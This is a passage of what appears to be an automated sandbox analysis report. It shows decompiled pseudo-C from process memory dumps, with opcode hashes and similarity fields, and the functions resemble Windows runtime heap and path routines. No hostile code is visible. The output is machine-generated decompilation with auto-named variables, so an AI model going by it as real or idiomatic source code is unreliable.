                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a66c7c5a9f36230ea37ac0e8e38c0dc93b17026b779de51d699fb444dfa7d0c0
                        • Instruction ID: 6f959af89e147f9cf30ebb9f90e2abd7b2b4c4a14139c683bd5870d7571de67f
                        • Opcode Fuzzy Hash: a66c7c5a9f36230ea37ac0e8e38c0dc93b17026b779de51d699fb444dfa7d0c0
                        • Instruction Fuzzy Hash: EB41B2B1A403189FEB25DF14CC90FABB7BAEB45714F2140E9E8459B281D770DE44CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E02BA8A0A(intOrPtr* __ecx, signed int __edx) {
                        				signed int _v8;
                        				char _v524;
                        				signed int _v528;
                        				void* _v532;
                        				char _v536;
                        				char _v540;
                        				char _v544;
                        				intOrPtr* _v548;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t44;
                        				void* _t46;
                        				void* _t48;
                        				signed int _t53;
                        				signed int _t55;
                        				intOrPtr* _t62;
                        				void* _t63;
                        				unsigned int _t75;
                        				signed int _t79;
                        				unsigned int _t81;
                        				unsigned int _t83;
                        				signed int _t84;
                        				void* _t87;
                        
                        				_t76 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t84;
                        				_v536 = 0x200;
                        				_t79 = 0;
                        				_v548 = __edx;
                        				_v544 = 0;
                        				_t62 = __ecx;
                        				_v540 = 0;
                        				_v532 =  &_v524;
                        				if(__edx == 0 || __ecx == 0) {
                        					L6:
                        					return E02BDB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                        				} else {
                        					_v528 = 0;
                        					E02BAE9C0(1, __ecx, 0, 0,  &_v528);
                        					_t44 = _v528;
                        					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                        					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                        					_t46 = 0xa;
                        					_t87 = _t81 - _t46;
                        					if(_t87 > 0 || _t87 == 0) {
                        						 *_v548 = 0x2b71180;
                        						L5:
                        						_t79 = 1;
                        						goto L6;
                        					} else {
                        						_t48 = E02BC1DB5(_t62,  &_v532,  &_v536);
                        						_t76 = _v528;
                        						if(_t48 == 0) {
                        							L9:
                        							E02BD3C2A(_t81, _t76,  &_v544);
                        							 *_v548 = _v544;
                        							goto L5;
                        						}
                        						_t62 = _v532;
                        						if(_t62 != 0) {
                        							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                        							_t53 =  *_t62;
                        							_v528 = _t53;
                        							if(_t53 != 0) {
                        								_t63 = _t62 + 4;
                        								_t55 = _v528;
                        								do {
                        									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                        										if(E02BA8999(_t63,  &_v540) == 0) {
                        											_t55 = _v528;
                        										} else {
                        											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                        											_t55 = _v528;
                        											if(_t75 >= _t83) {
                        												_t83 = _t75;
                        											}
                        										}
                        									}
                        									_t63 = _t63 + 0x14;
                        									_t55 = _t55 - 1;
                        									_v528 = _t55;
                        								} while (_t55 != 0);
                        								_t62 = _v532;
                        							}
                        							if(_t62 !=  &_v524) {
                        								L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                        							}
                        							_t76 = _t83 & 0x0000ffff;
                        							_t81 = _t83 >> 0x10;
                        						}
                        						goto L9;
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fbcb539d5a4638c4a727d0401c8681b446f7a6167b215581d7444758e43e93d
                        • Instruction ID: fdac9af5cb0db7f2cbb9d5e83908b0af781499a443dbb8551469706df0a1691b
                        • Opcode Fuzzy Hash: 2fbcb539d5a4638c4a727d0401c8681b446f7a6167b215581d7444758e43e93d
                        • Instruction Fuzzy Hash: 1D4180B1A0522C9BDB24DF19CC98BA9B3F5FB44300F5045EAD91997641E7719E80CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02C5AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                        				intOrPtr _v8;
                        				char _v12;
                        				signed int _v16;
                        				signed char _v20;
                        				intOrPtr _v24;
                        				char* _t37;
                        				void* _t47;
                        				signed char _t51;
                        				void* _t53;
                        				char _t55;
                        				intOrPtr _t57;
                        				signed char _t61;
                        				intOrPtr _t75;
                        				void* _t76;
                        				signed int _t81;
                        				intOrPtr _t82;
                        
                        				_t53 = __ecx;
                        				_t55 = 0;
                        				_v20 = _v20 & 0;
                        				_t75 = __edx;
                        				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                        				_v24 = __edx;
                        				_v12 = 0;
                        				if((_t81 & 0x01000000) != 0) {
                        					L5:
                        					if(_a8 != 0) {
                        						_t81 = _t81 | 0x00000008;
                        					}
                        					_t57 = E02C5ABF4(_t55 + _t75, _t81);
                        					_v8 = _t57;
                        					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                        						_t76 = 0;
                        						_v16 = _v16 & 0;
                        					} else {
                        						_t59 = _t53;
                        						_t76 = E02C5AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                        						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                        							_t47 = E02C5AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                        							_t61 = _v20;
                        							if(_t61 != 0) {
                        								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                        								if(E02C3CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                        									L02BB77F0(_t53, 0, _t76);
                        									_t76 = 0;
                        								}
                        							}
                        						}
                        					}
                        					_t82 = _v8;
                        					L16:
                        					if(E02BB7D50() == 0) {
                        						_t37 = 0x7ffe0380;
                        					} else {
                        						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						E02C5131B(_t53, _t76, _t82, _v16);
                        					}
                        					return _t76;
                        				}
                        				_t51 =  *(__ecx + 0x20);
                        				_v20 = _t51;
                        				if(_t51 == 0) {
                        					goto L5;
                        				}
                        				_t81 = _t81 | 0x00000008;
                        				if(E02C3CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                        					_t55 = _v12;
                        					goto L5;
                        				} else {
                        					_t82 = 0;
                        					_t76 = 0;
                        					_v16 = _v16 & 0;
                        					goto L16;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction ID: 9cf398830fa64a204a649b69b9b19d1ba4a9f67ad72d327ff16a8061132b89b4
                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction Fuzzy Hash: E031C232B009646BDB158B67C845BAFF7ABEFC4314F054169EC05A7291DB74DE80CA98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02C5FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                        				char _v8;
                        				signed int _v12;
                        				signed int _t29;
                        				char* _t32;
                        				char* _t43;
                        				signed int _t80;
                        				signed int* _t84;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t56 = __edx;
                        				_t84 = __ecx;
                        				_t80 = E02C5FD4E(__ecx, __edx);
                        				_v12 = _t80;
                        				if(_t80 != 0) {
                        					_t29 =  *__ecx & _t80;
                        					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                        					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                        						E02C60A13(__ecx, _t80, 0, _a4);
                        						_t80 = 1;
                        						if(E02BB7D50() == 0) {
                        							_t32 = 0x7ffe0380;
                        						} else {
                        							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        						}
                        						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        							_push(3);
                        							L21:
                        							E02C51608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                        						}
                        						goto L22;
                        					}
                        					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                        						_t80 = E02C62B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                        						if(_t80 != 0) {
                        							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                        							_t77 = _v8;
                        							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                        								E02C5C8F7(_t66, _t77, 0);
                        							}
                        						}
                        					} else {
                        						_t80 = E02C5DBD2(__ecx[0xb], _t74, __edx, _a4);
                        					}
                        					if(E02BB7D50() == 0) {
                        						_t43 = 0x7ffe0380;
                        					} else {
                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                        						goto L22;
                        					} else {
                        						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                        						goto L21;
                        					}
                        				} else {
                        					_push(__ecx);
                        					_push(_t80);
                        					E02C5A80D(__ecx[0xf], 9, __edx, _t80);
                        					L22:
                        					return _t80;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction ID: 8e894d7a097bb7618f2e7af07f248c55f845809dcce03b51df226704409204aa
                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction Fuzzy Hash: CA312A323006906FD32A9B69C844F6AB7EAEFC6344F18455CEC4A8BB41DBB5DD81C718
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E02C5EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                        				signed int _v8;
                        				char _v12;
                        				intOrPtr _v15;
                        				char _v16;
                        				intOrPtr _v19;
                        				void* _v28;
                        				intOrPtr _v36;
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t26;
                        				signed int _t27;
                        				char* _t40;
                        				unsigned int* _t50;
                        				intOrPtr* _t58;
                        				unsigned int _t59;
                        				char _t75;
                        				signed int _t86;
                        				intOrPtr _t88;
                        				intOrPtr* _t91;
                        
                        				_t75 = __edx;
                        				_t91 = __ecx;
                        				_v12 = __edx;
                        				_t50 = __ecx + 0x30;
                        				_t86 = _a4 & 0x00000001;
                        				if(_t86 == 0) {
                        					E02BB2280(_t26, _t50);
                        					_t75 = _v16;
                        				}
                        				_t58 = _t91;
                        				_t27 = E02C5E815(_t58, _t75);
                        				_v8 = _t27;
                        				if(_t27 != 0) {
                        					E02B9F900(_t91 + 0x34, _t27);
                        					if(_t86 == 0) {
                        						E02BAFFB0(_t50, _t86, _t50);
                        					}
                        					_push( *((intOrPtr*)(_t91 + 4)));
                        					_push( *_t91);
                        					_t59 =  *(_v8 + 0x10);
                        					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                        					_push(0x8000);
                        					_t11 = _t53 - 1; // 0x0
                        					_t12 = _t53 - 1; // 0x0
                        					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                        					E02C5AFDE( &_v12,  &_v16);
                        					asm("lock xadd [eax], ecx");
                        					asm("lock xadd [eax], ecx");
                        					E02C5BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                        					_t55 = _v36;
                        					_t88 = _v36;
                        					if(E02BB7D50() == 0) {
                        						_t40 = 0x7ffe0388;
                        					} else {
                        						_t55 = _v19;
                        						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        					}
                        					if( *_t40 != 0) {
                        						E02C4FE3F(_t55, _t91, _v15, _t55);
                        					}
                        				} else {
                        					if(_t86 == 0) {
                        						E02BAFFB0(_t50, _t86, _t50);
                        						_t75 = _v16;
                        					}
                        					_push(_t58);
                        					_t88 = 0;
                        					_push(0);
                        					E02C5A80D(_t91, 8, _t75, 0);
                        				}
                        				return _t88;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction ID: ffa3a6128b85fb4755c344f9a52776ccd5191f7820c88e1a264398415d0e5693
                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction Fuzzy Hash: 4131B0726047159BC719DF25C880A6BB7AAFFC0350F048A2DF99687640DF31EA05CBA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E02C169A6(signed short* __ecx, void* __eflags) {
                        				signed int _v8;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				signed short _v28;
                        				signed int _v32;
                        				intOrPtr _v36;
                        				signed int _v40;
                        				char* _v44;
                        				signed int _v48;
                        				intOrPtr _v52;
                        				signed int _v56;
                        				char _v60;
                        				signed int _v64;
                        				char _v68;
                        				char _v72;
                        				signed short* _v76;
                        				signed int _v80;
                        				char _v84;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t68;
                        				intOrPtr _t73;
                        				signed short* _t74;
                        				void* _t77;
                        				void* _t78;
                        				signed int _t79;
                        				signed int _t80;
                        
                        				_v8 =  *0x2c8d360 ^ _t80;
                        				_t75 = 0x100;
                        				_v64 = _v64 & 0x00000000;
                        				_v76 = __ecx;
                        				_t79 = 0;
                        				_t68 = 0;
                        				_v72 = 1;
                        				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                        				_t77 = 0;
                        				if(L02BA6C59(__ecx[2], 0x100, __eflags) != 0) {
                        					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                        					if(_t79 != 0 && E02C16BA3() != 0) {
                        						_push(0);
                        						_push(0);
                        						_push(0);
                        						_push(0x1f0003);
                        						_push( &_v64);
                        						if(E02BD9980() >= 0) {
                        							E02BB2280(_t56, 0x2c88778);
                        							_t77 = 1;
                        							_t68 = 1;
                        							if( *0x2c88774 == 0) {
                        								asm("cdq");
                        								 *(_t79 + 0xf70) = _v64;
                        								 *(_t79 + 0xf74) = 0x100;
                        								_t75 = 0;
                        								_t73 = 4;
                        								_v60 =  &_v68;
                        								_v52 = _t73;
                        								_v36 = _t73;
                        								_t74 = _v76;
                        								_v44 =  &_v72;
                        								 *0x2c88774 = 1;
                        								_v56 = 0;
                        								_v28 = _t74[2];
                        								_v48 = 0;
                        								_v20 = ( *_t74 & 0x0000ffff) + 2;
                        								_v40 = 0;
                        								_v32 = 0;
                        								_v24 = 0;
                        								_v16 = 0;
                        								if(E02B9B6F0(0x2b7c338, 0x2b7c288, 3,  &_v60) == 0) {
                        									_v80 = _v80 | 0xffffffff;
                        									_push( &_v84);
                        									_push(0);
                        									_push(_v64);
                        									_v84 = 0xfa0a1f00;
                        									E02BD9520();
                        								}
                        							}
                        						}
                        					}
                        				}
                        				if(_v64 != 0) {
                        					_push(_v64);
                        					E02BD95D0();
                        					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                        					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                        				}
                        				if(_t77 != 0) {
                        					E02BAFFB0(_t68, _t77, 0x2c88778);
                        				}
                        				_pop(_t78);
                        				return E02BDB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02eb904df552c2dcd7a3502bd6d5d14e9647e2730355dcd5aaeea19f3fbdb69a
                        • Instruction ID: 212a177e5801064880fe421c1e64a9e402a4a2493d30cf9c4f4c771f5efc3a3c
                        • Opcode Fuzzy Hash: 02eb904df552c2dcd7a3502bd6d5d14e9647e2730355dcd5aaeea19f3fbdb69a
                        • Instruction Fuzzy Hash: 3F41C0B1D40208AFDB14DFA4D841BFEBBF9EF49718F14826AE814A3280EB709945DF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E02B95210(intOrPtr _a4, void* _a8) {
                        				void* __ecx;
                        				intOrPtr _t31;
                        				signed int _t32;
                        				signed int _t33;
                        				intOrPtr _t35;
                        				signed int _t52;
                        				void* _t54;
                        				void* _t56;
                        				unsigned int _t59;
                        				signed int _t60;
                        				void* _t61;
                        
                        				_t61 = E02B952A5(1);
                        				if(_t61 == 0) {
                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                        					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                        				} else {
                        					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                        					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                        				}
                        				_t60 = _t59 >> 1;
                        				_t32 = 0x3a;
                        				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                        					_t52 = _t60 + _t60;
                        					if(_a4 > _t52) {
                        						goto L5;
                        					}
                        					if(_t61 != 0) {
                        						asm("lock xadd [esi], eax");
                        						if((_t32 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(_t61 + 4)));
                        							E02BD95D0();
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        						}
                        					} else {
                        						E02BAEB70(_t54, 0x2c879a0);
                        					}
                        					_t26 = _t52 + 2; // 0xddeeddf0
                        					return _t26;
                        				} else {
                        					_t52 = _t60 + _t60;
                        					if(_a4 < _t52) {
                        						if(_t61 != 0) {
                        							asm("lock xadd [esi], eax");
                        							if((_t32 | 0xffffffff) == 0) {
                        								_push( *((intOrPtr*)(_t61 + 4)));
                        								E02BD95D0();
                        								L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        							}
                        						} else {
                        							E02BAEB70(_t54, 0x2c879a0);
                        						}
                        						return _t52;
                        					}
                        					L5:
                        					_t33 = E02BDF3E0(_a8, _t54, _t52);
                        					if(_t61 == 0) {
                        						E02BAEB70(_t54, 0x2c879a0);
                        					} else {
                        						asm("lock xadd [esi], eax");
                        						if((_t33 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(_t61 + 4)));
                        							E02BD95D0();
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        						}
                        					}
                        					_t35 = _a8;
                        					if(_t60 <= 1) {
                        						L9:
                        						_t60 = _t60 - 1;
                        						 *((short*)(_t52 + _t35 - 2)) = 0;
                        						goto L10;
                        					} else {
                        						_t56 = 0x3a;
                        						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                        							 *((short*)(_t52 + _t35)) = 0;
                        							L10:
                        							return _t60 + _t60;
                        						}
                        						goto L9;
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ec34b97b135cca3d4e1ed91254c7ff2140134984d7596284425e75445af359f
                        • Instruction ID: 95aea1a22100b005c2d9cd81f3556942e8598dc455e51690dae0bff6d6412e40
                        • Opcode Fuzzy Hash: 6ec34b97b135cca3d4e1ed91254c7ff2140134984d7596284425e75445af359f
                        • Instruction Fuzzy Hash: 5A312A32241600DBCB76BF18C890B76B7A6FF00764F514AB9E9550B5B6EB71E804CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02BCA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t35;
                        				intOrPtr _t39;
                        				intOrPtr _t45;
                        				intOrPtr* _t51;
                        				intOrPtr* _t52;
                        				intOrPtr* _t55;
                        				signed int _t57;
                        				intOrPtr* _t59;
                        				intOrPtr _t68;
                        				intOrPtr* _t77;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t81;
                        				char* _t82;
                        				void* _t83;
                        
                        				_push(0x24);
                        				_push(0x2c70220);
                        				E02BED08C(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                        				_t79 = __ecx;
                        				_t35 =  *0x2c87b9c; // 0x0
                        				_t55 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                        				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                        				if(_t55 == 0) {
                        					_t39 = 0xc0000017;
                        					L11:
                        					return E02BED0D1(_t39);
                        				}
                        				_t68 = 0;
                        				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                        				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                        				_t7 = _t55 + 8; // 0x8
                        				_t57 = 6;
                        				memcpy(_t7, _t79, _t57 << 2);
                        				_t80 = 0xfffffffe;
                        				 *(_t83 - 4) = _t80;
                        				if(0 < 0) {
                        					L14:
                        					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                        					L20:
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                        					_t39 = _t81;
                        					goto L11;
                        				}
                        				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                        					_t81 = 0xc000007b;
                        					goto L20;
                        				}
                        				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                        					_t59 =  *((intOrPtr*)(_t83 + 8));
                        					_t45 =  *_t59;
                        					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                        					 *_t59 = _t45 + 1;
                        					L6:
                        					 *(_t83 - 4) = 1;
                        					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                        					 *(_t83 - 4) = _t80;
                        					if(_t68 < 0) {
                        						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                        						if(_t82 == 0) {
                        							goto L14;
                        						}
                        						asm("btr eax, ecx");
                        						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                        						if( *_t82 != 0) {
                        							 *0x2c87b10 =  *0x2c87b10 - 8;
                        						}
                        						goto L20;
                        					}
                        					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                        					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                        					_t51 =  *0x2c8536c; // 0x2733fc0
                        					if( *_t51 != 0x2c85368) {
                        						_push(3);
                        						asm("int 0x29");
                        						goto L14;
                        					}
                        					 *_t55 = 0x2c85368;
                        					 *((intOrPtr*)(_t55 + 4)) = _t51;
                        					 *_t51 = _t55;
                        					 *0x2c8536c = _t55;
                        					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                        					if(_t52 != 0) {
                        						 *_t52 = _t55;
                        					}
                        					_t39 = 0;
                        					goto L11;
                        				}
                        				_t77 =  *((intOrPtr*)(_t83 + 8));
                        				_t68 = E02BCA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                        				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                        				if(_t68 < 0) {
                        					goto L14;
                        				}
                        				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                        				goto L6;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 526cda58d992e4b870aa7c1dd5990f7f1f1d8c48032b634d206bb6a8cb85e44e
                        • Instruction ID: c51f3432911099f7b7987f29068cca159794fae168d680a339475311c9a8cf66
                        • Opcode Fuzzy Hash: 526cda58d992e4b870aa7c1dd5990f7f1f1d8c48032b634d206bb6a8cb85e44e
                        • Instruction Fuzzy Hash: 7C415A75A00209DFCB15CF58C890BA9BBF2FB49714F25C1AEE805AB381D774A941CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BD3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                        				intOrPtr _v8;
                        				char _v12;
                        				signed short** _t33;
                        				short* _t38;
                        				intOrPtr* _t39;
                        				intOrPtr* _t41;
                        				signed short _t43;
                        				intOrPtr* _t47;
                        				intOrPtr* _t53;
                        				signed short _t57;
                        				intOrPtr _t58;
                        				signed short _t60;
                        				signed short* _t61;
                        
                        				_t47 = __ecx;
                        				_t61 = __edx;
                        				_t60 = ( *__ecx & 0x0000ffff) + 2;
                        				if(_t60 > 0xfffe) {
                        					L22:
                        					return 0xc0000106;
                        				}
                        				if(__edx != 0) {
                        					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                        						L5:
                        						E02BA7B60(0, _t61, 0x2b711c4);
                        						_v12 =  *_t47;
                        						_v12 = _v12 + 0xfff8;
                        						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                        						E02BA7B60(0xfff8, _t61,  &_v12);
                        						_t33 = _a8;
                        						if(_t33 != 0) {
                        							 *_t33 = _t61;
                        						}
                        						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                        						_t53 = _a12;
                        						if(_t53 != 0) {
                        							_t57 = _t61[2];
                        							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                        							while(_t38 >= _t57) {
                        								if( *_t38 == 0x5c) {
                        									_t41 = _t38 + 2;
                        									if(_t41 == 0) {
                        										break;
                        									}
                        									_t58 = 0;
                        									if( *_t41 == 0) {
                        										L19:
                        										 *_t53 = _t58;
                        										goto L7;
                        									}
                        									 *_t53 = _t41;
                        									goto L7;
                        								}
                        								_t38 = _t38 - 2;
                        							}
                        							_t58 = 0;
                        							goto L19;
                        						} else {
                        							L7:
                        							_t39 = _a16;
                        							if(_t39 != 0) {
                        								 *_t39 = 0;
                        								 *((intOrPtr*)(_t39 + 4)) = 0;
                        								 *((intOrPtr*)(_t39 + 8)) = 0;
                        								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                        							}
                        							return 0;
                        						}
                        					}
                        					_t61 = _a4;
                        					if(_t61 != 0) {
                        						L3:
                        						_t43 = L02BB4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                        						_t61[2] = _t43;
                        						if(_t43 == 0) {
                        							return 0xc0000017;
                        						}
                        						_t61[1] = _t60;
                        						 *_t61 = 0;
                        						goto L5;
                        					}
                        					goto L22;
                        				}
                        				_t61 = _a4;
                        				if(_t61 == 0) {
                        					return 0xc000000d;
                        				}
                        				goto L3;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • Opcode ID: a75ed00be1a5534979e99bf723580cc2709513597a5e61aecfbe630432c3f3e5
